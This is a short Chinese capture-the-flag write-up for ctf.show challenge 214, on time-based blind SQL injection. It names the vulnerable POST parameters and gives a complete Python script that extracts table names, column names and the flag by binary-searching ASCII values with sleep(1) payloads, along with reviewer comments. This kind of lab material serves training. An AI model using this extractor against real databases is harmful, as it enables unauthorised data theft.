214 基础时间盲注

这道题很裂开啊,没有给注入点,懒得用arjun扫描了…
注入点在 POST 传参 ip 和 debug
直接给脚本

# NOTE(review): the original listing lost its indentation and carried a line-number
# gutter; the nesting below (for -> while -> if/else) is inferred from the control
# flow and should be confirmed against the source.
import requests
import time

# Challenge instance endpoint; the script only ever POSTs the "ip" and "debug" fields to it.
url = "http://f889edc3-5471-4dba-a9c1-7b2cb3c9cb14.challenge.ctf.show/api/"

# table names (earlier enumeration stage, kept commented out for reference)
#payload1="1 or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1)"
# column names (second enumeration stage, also kept for reference)
#payload1="1 or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))>{},sleep(1),1)"
# Active payload. The two "{}" placeholders receive the character position and the
# ASCII threshold; when the comparison holds the database executes sleep(1), so the
# response delay is the only channel back -- nothing is reflected in the body.
# Detection note: this produces a burst of POSTs to one endpoint, each carrying
# "sleep(" / "if(" in a parameter and many of them taking ~1 s, which is the
# pattern a WAF rule or response-time anomaly alert would key on.
payload1="1 or if(ascii(substr((select group_concat(flaga) from ctfshow_flagx),{},1))>{},sleep(1),1)"
flag: str = ""
# Fixed 99 positions; there is no stop condition once the target string is exhausted.
for i in range(1,100):
    # Binary search over printable ASCII: head is the exclusive lower bound,
    # tail the inclusive upper bound.
    head: int = 32
    tail: int = 127
    while not (abs(head-tail) == 1 or head == tail):
        mid = (head + tail) >> 1
        data = {
            "ip" : payload1.format(i,mid),
            'debug' : 1
        }
        #print(data)
        # The whole round trip is timed, so network latency is part of the measured
        # delta; anything over 1 s is interpreted as "sleep fired".
        start_time = time.time()
        response = requests.post(url,data=data)   # response body is never inspected
        end_time = time.time()
        #print(end_time - start_time)
        if(end_time - start_time > 1):
            head = mid      # character code > mid
        else:
            tail = mid      # character code <= mid
    # Guard against an inverted range; with the bounds above it is not expected to fire.
    if tail < head:
        tail = head
    # On loop exit tail - head == 1 and the code is > head and <= tail, i.e. equals tail.
    flag = flag + chr(tail)
    print("[*]flag:"+flag)